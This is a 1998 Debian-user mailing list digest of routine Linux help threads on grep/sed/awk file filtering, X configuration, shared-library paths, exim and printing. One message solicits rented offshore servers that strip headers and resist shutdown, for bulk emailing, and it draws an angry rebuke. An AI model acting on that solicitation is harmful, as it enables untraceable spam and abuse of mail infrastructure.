with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: awk or sed?

1998-04-07 Thread Fabien Ninoles
On Tue, Apr 07, 1998 at 12:55:48AM -0700, George Bonser wrote:
 On Tue, 7 Apr 1998, George Bonser wrote:
 
  Hehe, try grep!
  
  grep -vFf file2 file1
  
  should do it.
 
 For newbies:
 
 The original poster wants to filter file1 using file2. The output should
 contain everything in the input that is NOT matched by the pattern. That
 means we are going to need a v option to grep.  Now, the pattern is a list
 of items separated by newlines so we are going to need to tell grep this
 with the F option. Finally, the pattern is contained in a file. We tell
 grep the name of that file with the f option followed immediately with the
 filename so:
 
 grep -vFf pattern-file input file
 
 means:
 
 tell me everything that DOES NOT match what is in the newline delimited
 file pattern-file contained in input-file
 
 
 
 George Bonser 
 Just be thankful that Open Group does not own Linux.
 http://www.debian.org
 Debian/GNU Linux ... the maintainable operating system.
 

This will also delete every line that just match partially such as alpha2 or
hello-alpha. The correction will be to edited the pattern-file a little through
sed before submit it to grep:

sed -e 's/^/^/' -e 's/$/$/' pattern-file | grep -vf - input file

^ and $ stand for 'match begin/end of line' respectively. The sed part
(sed -e 's/^/^/' -e 's/$/$' pattern-file) say replace the beginning
of each line with '^' and replace the end of line with '$'. They are
then send to grep throughout the -f - (- are often used to mean take
file from standard input) and then apply to each line of input file.
Note that I removed the -F to let the default extend expression applied.
(The extended grep understand '^' and '$' meaning, but the fast(-F)
grep dont).

Note also that the reverse (finding all lines in file1 that match those
in file2) are easier to acheive through the join utility.
Litteraly is 'join file1 file2'.

-- 

Fabien Ninoles  Running Debian/GNU Linux
E-mail:[EMAIL PROTECTED]
WebPage:  http://www.callisto.si.usherb.ca/~94246757
WorkStation [available when connected!]: http://nightbird.tzone.org/
RSA PGP KEY [E3723845]: 1C C1 4F A6 EE E5 4D 99  4F 80 2D 2D 1F 85 C1 70



pgpsJcXpO41Bl.pgp
Description: PGP signature


patch for 2-step mirror-ing

1998-04-07 Thread Rainer Clasen
Hi!

Phone fees prevent me to mirror over my modem. But since I have access to a
fast connection at my university, I practice a 2-step method: Make a list of
files to get on my local machine runing 

  mirror -n other options | sed -n 's/^get file \(.*\) as .*/\1/'

and use the fast connection to put them on a tape. Then I restore the tape
at home and rerun mirror (still working on an offline sollution).

Unpatched mirror needs to be connected during the list generation - even when
used with a local_ls_lR_file (uhhh - expensive !!)

I modified mirror (2.8-16bo) to avoid staying/getting online when run with
-n and a local_ls_lR_file. I *think* I didn't break mirror when called
without -n and/or local_ls_lR_file.

Since someone asked for a similar solution some time ago, I think others may
also be interested in this patch. I'd appreciate, if someone could test it.
Since it is 2K gzipped I don't want to bother the list with it. Please ask
and I'll send it to you.

Maybe this could be include in the debian-package and/or forwarded upstream
if it stands the test?

Regards
 Rainer

---
KeyID=58341901 fingerprint=A5 57 04 B3 69 88 A1 FB  78 1D B5 64 E0 BF 72 EB


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: hamm state

1998-04-07 Thread Wolfgang Gernot Bauer
 On Mon, 6 Apr 1998, Jonas Bofjall wrote:
 
 : How can hamm go into frozen when dselect-over-FTP hasn't been fixed yet?
 : When will it be fixed (I recently tried the 98-03-29 disk set)?
 
 It's frozen so those problems can be fixed.  Frozen means no more
 changes other than bugfixes, not ready for prime time.  That's what
 stable means.
 
 Which problem did you have?  The missing perl functions are solved by
 the latest disks (I think; I'm going to test this later this week).

No they are not. You still get an error-message (some pearl-script is
missing) with the 98-03-29-disks (no newer disks on ftp.debian.org).

Hope there are new disks soon...

Gernot
-- 
-
Gernot Bauer   Salzburger Kredit- und Wechsel-Bank AG
eMail: [EMAIL PROTECTED] (Office)   Makartplatz 3, 5020 Salzburg
Home: [EMAIL PROTECTED]   Austria/Europe
 Phone: ++43-662-8684-364
The answer is yes, me. Fax:  ++43-662-8684-23


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: awk or sed?

1998-04-07 Thread Santiago Vila Doncel
-BEGIN PGP SIGNED MESSAGE-

A. M. Varon wrote:
 I have two files say, file1 and file2
 
 file1 contains:file2 contains:
 alpha  alpha
 bravo
 charlie
 
 What I want to do is compare the two files, and delete the contents of
 file1 according to file2. So, from the above, I'll have to delete the word
 alpha from file1. Can it be possible using sed? or awk?

If you do not want to worry about regexps, you may try this gawk script:

#!/usr/bin/gawk -f
{
  if (ARGIND == 1)
a[$0] = 1
  else if (! ($0 in a))
print $0
}

and then do:exclude.gawk file2 file1  new.file1

(It has to be gawk because mawk has not ARGIND, I'm afraid, but maybe
there are some way to rewrite this for general awk).

-BEGIN PGP SIGNATURE-
Version: 2.6.3ia
Charset: latin1

iQCVAgUBNSpKISqK7IlOjMLFAQFY3wP9EmtfMHhMlbJpJ7SCpt8gEjxtzb0NREnj
tnKOgySjPQOFI6yw1QUo1KmyVRduHWlxN41TXQoU17pxlNfGtAjUeDzuGxvFmXTl
p8RRarlxEGBGjd6XN3a7m4sHtnYOgksQ0FQpX91H4FBfsED3ORhRf/MYvBUTR14T
ZmfncsI2bWc=
=WiWd
-END PGP SIGNATURE-


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


kill top and ps

1998-04-07 Thread CHUCK
I have made a mistake with a floppy tape and am having trouble recovering. The
tape works fine but I just did an mt command on an unformated tape and the
process hung. I tried kill, kill -9, neither of which worked. ps and top both
 showed it as running. So I killed the xterm it was running in. Now ps shows
it to be not present, but top says it is running, and at about 50% of the cpu
 time. Any suggestions?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: HP Deskjet 672C

1998-04-07 Thread Will Lowe
  Does it print at 600 dpi,  or at 300dpi ... the specs show 600 dpi with
  REt,  which I was afraid might be a Windoze sort of thing ...
 
 I am pretty sure that HP specifications refer to resolution before
 their REt enhancements.  This is unlike Okidata who often quote

Great.  I don't care really (only going to use it to print reports and
stuff),  but I _hate_ it when the given specs assume that you've got some
overoptimized windows driver installed...

Thanks,  Carl.

Will


--
| [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]   |
|   http://www.cis.udel.edu/~lowe/   |
|PGP Public Key:  http://www.cis.udel.edu/~lowe/index.html#pgpkey|
--
|   You think you're so smart,  but I've seen you naked  |
|  and I'll prob'ly see you naked again ...  |
| --The Barenaked Ladies,  Blame It On Me  |
--


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: LibICE and general X install

1998-04-07 Thread Daniel Mashao
On Tue, 7 Apr 1998, Oliver Elphick wrote:

 Tristan Day wrote:
   When trying to install lib6 and many x-related packages to get x running, I
   keep being unable to install them, as dpkg tells me that I haven't got
   libICE something-or-other. I looked thru www.debian.org/packages and can't
   find it.
 
 libICE.so is in xlib6 (for libc5) or xlib6g (for libc6); you might also
 need xlib6g-dev or xlib6-altdev.  If you're running all bo (Debian 1.3.1),
 you probably need xlib6 and xlib6-dev.
Thanks for the info. I usually get these errors and I ignore them.
 
   Also one of the packages says it needs ccp whatever that is.
 
 I've never heard of that.  Do you happen to mean cpp (which is in gcc)?
Yes you need cpp if you do not want to install the whole gcc for apps such
as the window manager fvwm. I think its under intepreters directory.

/---/
Daniel J. Mashao
Electrical Engineering[EMAIL PROTECTED]
University of Cape Town http://www.ee.uct.ac.za/~daniel 
Rondebosch, 7700, S. Africa(w) 27+21+650 2816   (h) 27+21+705 1233
/---/


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: X configuration problem

1998-04-07 Thread LeRoy D. Cressy
 the problem:
 
 my X desktop is 4 time wider than my available space on the monitor and
 the resolution is not good either.
 
 what i tried:
 
 i played a bit with XF86Config making only a change at a time (and keeping
 a backup of the last configuration that worked too),this hasn't worked,i
 know what is the problem but not the solution,so here's my XF86Config
 file,i'll show what's the problem further down this message:
 

 
 # **
 # Graphics device section
 # **
 
 # Any number of graphics device sections may be present
 
 # Standard VGA Device:
 
 Section Device
 Identifier  Generic VGA
 VendorName  Unknown
 BoardName   Unknown
 Chipset generic
 
 VideoRam256
 
 Clocks  25.17  28.32
 
 EndSection
 

 Section Device
 Identifier  tricom excel
 VendorName  tricom
 BoardName   excel
 VideoRam256
 Ramdac  normal
 Clocks  25.17  28.32   0.00   0.00
 EndSection
 
 # **
 # Screen sections
 # **
 
 # The Colour SVGA server
 
 Section Screen
 Driver  svga
 # Use Device Generic VGA for Standard VGA 320x200x256
 #Device  Generic VGA
 Device  tricom excel
 Monitor Samsung SyncMaster 3ni
 Subsection Display
 Depth   8
 # Omit the Modes line for the Generic VGA device
 Modes   320x200
 ViewPort0 0
 # Use Virtual 320 200 for Generic VGA
 EndSubsection
 Subsection Display
 Depth   16
 Modes   640x480
 ViewPort0 0
 EndSubsection
 Subsection Display
 Depth   24
 Modes   640x480
 ViewPort0 0
 EndSubsection
 Subsection Display
 Depth   32
 Modes   640x480
 ViewPort0 0
 EndSubsection
 EndSection
 
 # The 16-color VGA server
 
 Section Screen
 Driver  vga16
 Device  Generic VGA
 Monitor Samsung SyncMaster 3ni
 Subsection Display
 Modes   640x480 800x600
 ViewPort0 0
 Virtual 800 600
 EndSubsection
 EndSection
 
 # The Mono server
 
 Section Screen
 Driver  vga2
 Device  Generic VGA
 Monitor Samsung SyncMaster 3ni
 Subsection Display
 Modes   640x480 800x600
 ViewPort0 0
 Virtual 800 600
 EndSubsection
 EndSection
 
 # The accelerated servers (S3, Mach32, Mach8, 8514, P9000, AGX, W32, Mach64)
 
 Section Screen
 Driver  accel
 Device  tricom excel
 Monitor Samsung SyncMaster 3ni
 Subsection Display
 Depth   8
 Modes   640x400
 ViewPort0 0
 EndSubsection
 Subsection Display
 Depth   16
 Modes   640x480
 ViewPort0 0
 EndSubsection
 Subsection Display
 Depth   24
 Modes   640x480
 ViewPort0 0
 EndSubsection
 Subsection Display
 Depth   32
 Modes   640x480
 ViewPort0 0
 EndSubsection
 EndSection
 

First of all I notice that you are saying that you only have 
256k of video ram.  If this is the case then you cannot even
run 640x480x256 color mode.  This requires a least 1 meg of
video ram.  At 256K of video ram 320x200 mode is the only mode
that you can possible run which is atrocious resolution.  You 
probably have more video ram than you are saying.  Check your
computer by running 

SuperProbe 

as root.  This program will return your video system hardware
including how much video ram you have.  Also if you really have
only 256k of video ram, spend a few bucks and get at least 1 meg
of video ram for your system.

Hope this helps :-)

LeRoy
-- 
  0 0  L  R Associates
  Home Page:http://www.netaxs.com/~ldc/
___ooO ~ Ooo___

LeRoy D. Cressy  /\_/\  [EMAIL PROTECTED]
Computer Consulting ( o.o ) Phone (215) 535-4037
  ^   Fax   (215) 535-4285


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: awk or sed?

1998-04-07 Thread Richard E. Hawkins Esq.
george wrote,

 Wow, a question to an answer in 3 minutes! that's very fast thanks.

Can you get THAT from Microsoft ;)


does getting to a device that will send you the wrong irrelevant fax and 
charge your credit card count?

:)

-- 
These opinions will not be those of ISU until it pays my retainer.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Object-Oriented Database

1998-04-07 Thread CANTRELL
Does anyone know of an object-oriented database that uses the odmg c++
bindings and run under Linux.  I have been using poet and o2, but from
what I can tell they have no Linux version available.

Thanks in advance.
--Aaron Cantrell



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: exim 1.90-2: eximconfig doesn't work.

1998-04-07 Thread Mark Baker
On Tue, Apr 07, 1998 at 08:19:10PM +1000, Alan Eugene Davis wrote:

 I had to back out of exim 1.90-2 because the eximconfig script 
 bombed.  I don't know why, but when I installed 1.89.1-1, the script
 ran perfectly.  

eximconfig shouldn't run on upgrades, so I'm surprised it tried to run it
anyway.

I've spotted the error. I hadn't bothered to test it as the only change was
in a comment; however it was a comment in the generated config file, and so
embedded in a perl string---and that meant that the apostrophe in the
comment terminated the string and caused the script to die.

I'll release 1.90-3 this evening which should fix this.

 This is by leaps and bounds the easiest mail transport agent I have
 yet to install.  I don't know yet whether it works: I'm encouraged.  
 Eximon requires some gymnastics I guess, unless one runs X as root.

Use sudo or something similar, or add yourself to the mail group.

[Please cc any replies to me, as I don't read debian-user]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


ld.so.conf question

1998-04-07 Thread Brian White
I have the following ld.so.conf file:

/usr/X11R6/lib/Xaw95
/usr/X11R6/lib/Xaw3d
/usr/local/lib
/usr/lib/libc5-compat
/lib/libc5-compat
/usr/X11R6/lib
/usr/X11R6/lib
/usr/X11R6/lib

Question: Shouldn't /usr/X11R6/lib be before the libc5-compat directory
and shouldn't there only be one of them?

  Brian
 ( [EMAIL PROTECTED] )

---
   Touch passion when it comes your way.  It's rare enough as it is;
   don't walk away when it calls you by name.  -- Marcus (Babylon 5)


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Netscape, the bus errors, and everything

1998-04-07 Thread Richard E. Hawkins Esq.

Someday I'm going to learn to never upgrade netscape once I have it working.

I had 3.0.1 quite happy, and I tried 4, which lacked the features I used.  So 
i tried to go back, and got a usable but broken install.  Then I tried mozilla 
5, and everything broke.

So after a couple of install/purge cycles, and switching to 3.0.4, I have an 
installation that thinks it works; dpkg is happy.

But when I run it, I get

eyryttyp0:hawknetscape
Netscape: Ignoring unsupported format code in mailcap file: %{
Netscape: Ignoring unsupported format code in mailcap file: %{
Netscape: Ignoring unsupported format code in mailcap file: %{
Bus error


how do I get it back?  mozilla largely doesn't work (bizarre page formatting, 
failing to set up scrollbars, incorrectly returning page has no data, etc.)

-- 
These opinions will not be those of ISU until it pays my retainer.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Printing with an old tractor

1998-04-07 Thread B. Bell
On Tue, 7 Apr 1998, Johan Wilhelm Kluwer wrote:
 I have a problem that should have a really simple answer that I
 nevertheless have not been able to find. I have an old, powerweak computer
 into which I have just been able to fit emacs and latex. This works fine,
 but: How to print DVI files? The printer I dispose of is an old Citizen
 dot-matrix, I suppose 180 DPI.
 
 I could theoretically use ghostscript for printing, but I'm confident that
 that would be *very slow indeed*.
 
 Is there a slimmer way of getting DVI files onto a dot-matrix printer?

I think ghostscript is the only right way to do it.  If emacs is fast
enough for you, ghostscript shouldn't be a problem.

brad


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Server(s) Needed

1998-04-07 Thread servers
Hello,

If you or someone you know has an available email server we are interested in 
renting it by the month.

The server must be located outside of the United States and must strip all 
incoming headers.

The server will be used for Bulk Emailing Purposes.

We will pay $500 United States Dollars per month of use per server.  We must be 
assured that the server will not be shut down for any reason.

Additionally, we must have full telnet access to setting up accounts on the 
server.

If you do not have such a server yourself please let us know of someone who 
does.  We will pay a finders fee to you if we use a system that you refer us to.

Please email us back at:[EMAIL PROTECTED]

Email us back today with your information.

Thank you,

- max2001bulkisp.com



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: ld.so.conf question

1998-04-07 Thread David Engel
On Tue, Apr 07, 1998 at 01:39:59PM -0400, Brian White wrote:
 I have the following ld.so.conf file:
 
 /usr/X11R6/lib/Xaw95
 /usr/X11R6/lib/Xaw3d
 /usr/local/lib
 /usr/lib/libc5-compat
 /lib/libc5-compat
 /usr/X11R6/lib
 /usr/X11R6/lib
 /usr/X11R6/lib
 
 Question: Shouldn't /usr/X11R6/lib be before the libc5-compat directory

Not necessarily.  As long as you don't have any duplicate libraries
that aren't tagged properly, it doesn't matter what order they are in.

 and shouldn't there only be one of them?

There should only be one, but the duplicates shouldn't cause any
problems.

David
-- 
David EngelODS Networks
[EMAIL PROTECTED]   1001 E. Arapaho Road
(972) 234-6400 Richardson, TX  75081


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: ld.so.conf question

1998-04-07 Thread Brian White
  /usr/X11R6/lib/Xaw95
  /usr/X11R6/lib/Xaw3d
  /usr/local/lib
  /usr/lib/libc5-compat
  /lib/libc5-compat
  /usr/X11R6/lib
  /usr/X11R6/lib
  /usr/X11R6/lib
 
  Question: Shouldn't /usr/X11R6/lib be before the libc5-compat directory
 
 Not necessarily.  As long as you don't have any duplicate libraries
 that aren't tagged properly, it doesn't matter what order they are in.

The problem I'm encountering is that linking -lXmu seems to cause
the libc5-compat version of libXtk to get included and then I get
warnings about libc5/libc6 conflicts.  I was wondering if this could
be the cause.

  Brian
 ( [EMAIL PROTECTED] )

---
 the difference between theory and practice is less in theory than in practice



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


EXT2 fs questions

1998-04-07 Thread shaul
Lately I was forced into single user mode while booting because e2fsck had 
discovered some problems with the HD.
I was able to pass that after e2fsck -c. However, althought the fs is now 
states itself as clean, running e2fsck -f still shows some errors (problems ?).
1) Could it be that this is happening becuase it is an IDE disk which is 
suposed to repair badblocks by itself ?
2) Should I do something about these errors ?
3) I was trying to run badblocks, but failed. Probably becuase I didn't 
supplied badblocks all the parameters it required, such as the block size. How 
can I get this information ?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


KDE

1998-04-07 Thread Graham Pople
There are kdelibs and kdesupport Debian packages on your site; is there
a kdebase one on the way too?

--

Graham Pople ([EMAIL PROTECTED])
SNES emulators at Emulation One (http://www.jalna.demon.co.uk/index.htm)

All emulators at E1 Newsletter (http://www.jalna.demon.co.uk/e1news.htm)




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Printing with an old tractor

1998-04-07 Thread Paul Huygen

Johan Wilhelm Kluwer [EMAIL PROTECTED] wrote:

 How to print DVI files? The printer I dispose of is an old Citizen
 dot-matrix,[..] I'm confident that [using Ghostscript]
 would be *very slow indeed*.

I think so. I used to have a dot-matrix, and it could take up to 10
minute to print a page. If you only want to print draft, you may
consider using dvi2tty. This program translates the dvi file into
plain, neatly formatted, ascii.

Regards,

Paul Huygen.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: ld.so.conf question

1998-04-07 Thread David Engel
On Tue, Apr 07, 1998 at 03:10:11PM -0400, Brian White wrote:
   /usr/X11R6/lib/Xaw95
   /usr/X11R6/lib/Xaw3d
   /usr/local/lib
   /usr/lib/libc5-compat
   /lib/libc5-compat
   /usr/X11R6/lib
   /usr/X11R6/lib
   /usr/X11R6/lib
  
   Question: Shouldn't /usr/X11R6/lib be before the libc5-compat directory
  
  Not necessarily.  As long as you don't have any duplicate libraries
  that aren't tagged properly, it doesn't matter what order they are in.
 
 The problem I'm encountering is that linking -lXmu seems to cause
 the libc5-compat version of libXtk to get included and then I get
 warnings about libc5/libc6 conflicts.  I was wondering if this could
 be the cause.

Could be.  What does ldd report for your libc5-compat version of
libXmu?

David
-- 
David EngelODS Networks
[EMAIL PROTECTED]   1001 E. Arapaho Road
(972) 234-6400 Richardson, TX  75081


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Linux freeform text database

1998-04-07 Thread dg
On Tue, 7 Apr 1998, Damon Muller wrote:

 This isn't specificically a Debian question, but I'm hoping that the
 combined knowledge locked up in this group might be able to point me in the
 right direction...
 
 I've recently acquired myself a little old laptop, which, with help from
 the group, is now loaded up and chugging along with Debian installed on it.
 This year I'm also doing my Masters, and so I'm going to have to be keeping
 track of a whole lot of literature and ideas and things like that. I've
 decided that my brain isn't up to the task, so I might need a bit of
 software help :)
 
 What I'm basically looking for is something along the lines of a freeform
 text database that will run under Linux (prefereable GPL'd or Freeware).
 Another possibility is DOSEMU, but native linux would be the prefered choice.
 
 Something which I can just use as a searchable cardfile or something like
 that would be good, but I have yet to find something like that that'll work
 under linux. I have got edb, which is a database that runs under emacs, but
 i'm not yet sure if that's really what I'm after. Also do know if I can be
 bothered working out how to create a new database (am I the only one who
 can't remember a million M-x emacs commands?).
 
 Surely there must be something like this around? I can't be the only linux
 user who has ever thought something like this would be A Good Thing. Any
 advice, tips, pointers, or anything like that would be greatly appreciated!

How much documents or records should you database hold ?? If it't only a
few, I would use simple text files (eventually with mail-like headers) and
search them with grep. Or built a small Tcl/Tk + perl frontend for it. If
you like to have binary files in your database, you could code them with
mime.

I know this isn't a real database. But you can use it, if you will not have
much documents in it. Have fun with it.

Bye

Daniel

--
Daniel Gross eMail: [EMAIL PROTECTED]
Hollarstrasse 2 [EMAIL PROTECTED]
D-85053 Ingolstadt, Germany
--

It's really quite a simple choice: Life, Death, or Los Angeles.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Server(s) Needed=DO NOT SPAM THIS LIST

1998-04-07 Thread DAVID B. TEAGUE

WHOEVR YOU ARE:

DO NOT SEND BULK MAIL TO THIS LIST. 

THE MAIL SERVERS THIS LIST USES ARE DONATED FREE, GRATIS, SO THE MEMBERS
CAN DEVELOP FREE SOFTWARE. YOU COST THIS PROJECT MONEY, REAL MONEY BY
SENDING SPAM TO THIS MAILING LIST

DO NOT SEND BULK MAIL TO THIS LIST.

YOU HAVE GONE TO A GOATS HOUSE FOR WOOL. ASKING THIS MAILING LIST FOR A
BULK MAIL SERVER IS LIKE ASKING A MUGGING VICTIM IF HE WANTS SLAPPED. 

STOP IT. We have legal recourse and will take all measures
available to us under law. DO NOT SEND BULK MAIL TO THIS LIST.

I am  not a developer, but I have great respect for those who do, and am
a beneficiary of their gift of free software. 

PLEASE STOP GETTING IN THE WAY!!! DO NOT SEND BULK MAIL TO THIS LIST.


--David Teague

On Wed, 8 Apr 1998 [EMAIL PROTECTED] wrote:

 Hello,
 
 If you or someone you know has an available email server we are
interested in renting it by the month. 
 
 The server must be located outside of the United States and must strip
all incoming headers. 
 
 The server will be used for Bulk Emailing Purposes.
 
 We will pay $500 United States Dollars per month of use per server.
We must be assured that the server will not be shut down for any reason. 
 
 Additionally, we must have full telnet access to setting up accounts
on the server. 
 
 If you do not have such a server yourself please let us know of
someone who does.  We will pay a finders fee to you if we use a system
that you refer us to.   
 
 Please email us back at:[EMAIL PROTECTED] 
 
 Email us back today with your information.
 
 Thank you,
 
 - max2001bulkisp.com
 
 
 
 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 
 

---
   LINUX: the FREE 32 bit OS for [3456]86 PC's available NOW!
David B Teague | Ask me how user interface copyrights  software
[EMAIL PROTECTED] | patents make programing a dangerous business. 

spy counter-intelligence wild porno sex gold bullion Soviet Bosnia 
clipper National Security Council explosion Treasury terrorist Delta 
Force bomb Iran Mossad data encryption munitions Serbian hydrazine 
ammonium nitrate fuel oil cocaine assassinate counterfeit destabilize 



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Help About SPARC

1998-04-07 Thread Pancho Horrillo

Hi!
Does anybody have any experience with UltraSparc and GNU/Linux?  I
know bo is not made for Sparc, but i think hamm is. A friend of mine
installed latest available version of RedHat for Sparc (4.2), and is
having troubles adjusting keyboard layout (is an spanish version of
keyboard). Apparently no kbd-0.XX.rpm can be found in the distribution.
Anybody has tried hamm in a Sparc? If so, is it available in NFS
somewhere? 

This friend of mine needs an stable distribution, since he wants
to work on his projects (he is a physicist), not to spend hours and hours
investigating how to set the system up (unlike me ;-)

The machine had Solaris installed, but I persuaded him to try a
GNU/Linux system, so he did. Free SoftWare better than propietary
(i.e. obscure ;-) SoftWare !!!

Is Debian 2.0 going to be available for Sparc?

Thank you in advance

--
Pancho Horrillo
[EMAIL PROTECTED]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Help About SPARC

1998-04-07 Thread Tim Sailer
Pancho Horrillo wrote:
 Anybody has tried hamm in a Sparc? If so, is it available in NFS
 somewhere? 

nfs llug.sep.bnl.gov:/home/pub/debian

Tim

-- 
 (work) [EMAIL PROTECTED] / (home) [EMAIL PROTECTED] - http://www.buoy.com/~tps
  Why am I soft in the middle, and the rest of my life is so hard?
   Paul Simon
** Disclaimer: My views/comments/beliefs, as strange as they are, are my own.**


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: ld.so.conf question

1998-04-07 Thread Scott McDermott
Brian White [EMAIL PROTECTED] on Tue, Apr 07, 1998 at 01:39:59PM -0400:
 Question: Shouldn't /usr/X11R6/lib be before the libc5-compat directory
 and shouldn't there only be one of them?

I'm not certain, but I don't think that the end result (ld.so.cache?) is
in any way affected by parse order.  The dlinker (1.9.7 anyways) has some
mechanism by which it `knows' if the app needs a libc5-linked binary or
libc6.

BTW, what are the ENOENT(ld.so.preload)s that I get so often? Can I use
this file to improve efficiency by creating it or something?

14 March '98 manpage says:

File containing a whitespace separated list of ELF shared
libraries to be loaded before the program.  libraries and an
ordered list of candidate libraries.

Does this mean I can pre-allocate which apps need what, reducing the
startup overhead?

-- 
Scott


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Cloning workstations

1998-04-07 Thread Jonas Bofjall
With a lot of luck I've succeeded in putting up a hamm system from
scratch. Now I want to make identical installations on a couple of
machines with almost identical hardware.

What is the easiest way? Can it be automated (I bet many people has
done this before..)? If I have to do it by tarring the disk to an
NFS-server and then booting on a floppy an tarring up to the target,
which files do I have to change with system-dependent info?

Another question: I am going to transform some half-useless Pentium60-
based win95 systems into UNIX workstations :-), but they only have
400MB-disks so I thought I'll have to put some stuff (perhaps /usr?)
on NFS. How well does this work with Debian's Package System?

It would be nice to fill the 400 MB with at least the most important
stuff (editor, TeX and stuff) so they'll be at least partially useable
even if the network goes down. So perhaps I could install that
barebones system on the workstations and a complete install on the
NFS-server, but I can't (can I?) force the installation of certain
programs to /usr/bin and some just to /bin. Of course, I still want
to take advantage of Debian's excellent upgrading system.

Thanks to everyone who put time and effort into this excellent OS!

  // Jonas [EMAIL PROTECTED] [2:201/262.37]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Kernel

1998-04-07 Thread mike


Is there a way to find the .config of a pre-built kernel?  I know
with FreeBSD you can, I was hoping it could save myself some guesswork.


Micro$oft, what do you want to spend today?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


something just sorta cool ...

1998-04-07 Thread Adam Shand

just found something that i thought was sorta cool ... so i figured i
would pass it along.

i had been wondering how pine knew to automatically launch lynx when it
receives an html attachment ... and traced it down to a line in
/etc/mailcap.

next i decided that i wanted it to launch Netscape instead but i wanted it
to load it into an existing Netscape window so i didn't have a problem
with the 'lock file message'.

anyway is is the voodoo incantation that appears to work very well :)

remove the lynx line from /etc/mailcap and add this one:

text/html; /usr/X11R6/bin/netscape -remote 'openFile(%s)'; needsterminal; 
description=HTML Text; nametemplate=%s.html

good luck and may the force be with you red five.

adam

 Internet Alaska -
 4050 Lake Otis Adam Shand(v) +1 907 562 4638
 Anchorage, AlaskaSystems Administrator   (f) +1 907 562 1677
- http://larry.earthlight.co.nz --



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


19980407 Work-Needing and Prospective Packages

1998-04-07 Thread wnpp

  Work-Needing and Prospective Packages for Debian GNU/Linux
   
   [EMAIL PROTECTED]
   $Id: prospective-packages.html,v 1.9 1998/04/07 21:36:24 johnie Exp $
   
   
   This document is intended to identify areas that need your
   contributions. It provides information that hopefully changes quite
   often, so it supplements the regular Debian Developer documentation:
   [1]http://www.debian.org/developers_corner.html. This document
   provides the current list of packages which are either:
   
 * orphaned,
 * withdrawn from the unstable distribution,
 * maintained but its developer would like to find a new person,
 * currently being worked on to include in the distribution, and
 * good ideas -- they would be nice to have, but no one is yet
   working on them.
   
   New versions of this document will be available via FTP and HTTP:
   
 * [2]http://www.debian.org/doc/prospective-packages.html
 * [3]ftp://ftp.debian.org/debian/doc/package-developer/prospective-p
   ackages.txt
 * [4]ftp://ftp.debian.org/debian/doc/package-developer/prospective-p
   ackages.html
   
   Please send additions, corrections, suggestions and wishes to the WNPP
   maintainer ([EMAIL PROTECTED]). Please mention which version of this
   document your comments refer.
   
   Try to change the subject of your mail to reflect the packages you're
   talking about, it makes it easier for to sort out all Re:
   Work-Needing and Prospective Packages emails. A suggested subject
   line reads WNPP: removing foopackage or WNPP: working on
   barpackage. Thanks.
 _
   
Recent Changes
   
Since version 1998/03/30

